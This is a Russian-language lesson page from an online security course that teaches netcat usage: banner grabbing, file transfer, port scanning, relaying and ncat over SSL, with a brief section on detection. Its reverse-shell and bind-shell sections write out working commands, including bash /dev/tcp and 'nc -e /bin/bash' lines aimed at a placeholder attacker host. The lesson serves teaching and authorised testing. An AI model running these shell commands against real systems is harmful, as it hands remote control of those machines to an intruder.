0Pricing
Cyber Security Academy · Урок

Netcat: швейцарский армейский нож

Используйте nc для получения баннеров, передачи файлов, перенаправления портов и простых обратных оболочек.

«Netcat: швейцарский армейский нож» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 3 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.

Что такое Неткат

Неткат (nc) — это утилита, которая читает и записывает данные через сетевые соединения TCP или UDP. Она установлена почти в каждой системе Юникс и незаменима для отладки, передачи файлов и базовой эксплуатации.

Установка соединения и получение баннера

Подключитесь к любому порту TCP, чтобы получить баннер службы и вручную взаимодействовать с протоколом. Это простейшая форма разведки.

# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]

# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTP

Прослушивание порта

Неткат может прослушивать входящие соединения с помощью -l -p. Это полезно для проверки соединения, перехвата обратных оболочек и приёма файлов.

# Listen on port 4444
nc -lvnp 4444

# -l listen
# -v verbose
# -n no DNS resolution
# -p port number

Передача файлов с помощью Нетката

Неткат может отправлять файлы, передавая их через конвейер в соединение. Получатель прослушивает соединение и перенаправляет вывод в файл. Шифрование отсутствует — используйте этот способ только в доверенных сетях.

# Receiver (runs first):
nc -lvnp 4444 > received_file.txt

# Sender:
nc 192.168.1.10 4444 < file_to_send.txt

Сканирование портов с помощью Нетката

Неткат поддерживает базовое сканирование портов с помощью -z (режим без ввода-вывода) и -w (время ожидания). Он работает медленнее Нмап, но полезен, когда Нмап недоступен.

# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded

# With timeout:
nc -zvw2 192.168.1.100 22 80 443

Простая обратная оболочка

Обратная оболочка заставляет цель подключиться обратно к злоумышленнику. Это полезно при тестах на проникновение, когда правила межсетевого экрана блокируют входящие соединения к цели.

# Attacker listens:
nc -lvnp 4444

# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

# Or via nc:
nc attacker_ip 4444 -e /bin/bash

Оболочка с прослушиванием порта

Оболочка с прослушиванием порта ожидает соединения на целевой машине. Злоумышленник подключается к ней. В современных тестах на проникновение такой вариант встречается реже, поскольку межсетевые экраны обычно блокируют входящие соединения.

# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash

# On attacker: connect
nc target_ip 5555

Режим UDP

Используйте -u для соединений UDP. Это полезно при проверке служб UDP, таких как DNS (порт 53) и SNMP (порт 161).

# Test DNS over UDP
nc -u 8.8.8.8 53

# Test SNMP
nc -u 192.168.1.1 161

Проксирование с помощью Нетката

Неткат может объединять соединения в цепочку, обеспечивая переход через сети. В сочетании с именованными каналами (mkfifo) он создаёт простые двусторонние туннели без дополнительных инструментов.

mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipe

Нкат: современная альтернатива

Нкат (часть Нмап) расширяет возможности Нетката поддержкой SSL (--ssl), контролем доступа и режимом посредника. Для зашифрованных каналов предпочтительно использовать Нкат.

# SSL listener
ncat --ssl -lvnp 4444

# SSL connect
ncat --ssl target_ip 4444

Защитникам: обнаружение Нетката

Соединения Нетката выглядят как обычные соединения TCP. Защитники обнаруживают его с помощью мониторинга имён процессов (HIDS), выявления необычных исходящих портов и обнаружения оболочки, запущенной неожиданным родительским процессом.

Быстрая проверка

Какой параметр Нетката включает режим прослушивания?

Итоги: Неткат

Неткат — фундаментальный инструмент: используйте его для получения баннеров, передачи файлов, проверки соединений и понимания принципов работы обратных оболочек и оболочек с прослушиванием порта. В разрешённых тестах на проникновение он помогает проверять правила межсетевого экрана и моделировать перемещение злоумышленника по сети. Хорошо изучите его — чтобы и использовать, и обнаруживать его.

Часто задаваемые вопросы

Урок «Netcat: швейцарский армейский нож» бесплатный?

Да — полный текст урока «Netcat: швейцарский армейский нож» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.

Чему я научусь в уроке «Netcat: швейцарский армейский нож»?

Используйте nc для получения баннеров, передачи файлов, перенаправления портов и простых обратных оболочек. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.

Нужен ли мне опыт, чтобы начать Cyber Security Academy?

Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 3 из 4.

Сколько времени занимает урок «Netcat: швейцарский армейский нож»?

Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.

Можно ли писать и запускать код в этом уроке Cyber Security Academy?

Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.

Все уроки этого курса

  1. Методы сканирования портов Nmap
  2. Определение сервисов и операционных систем
  3. Netcat: швейцарский армейский нож
  4. Скрипты перечисления сети
← Назад к Cyber Security Academy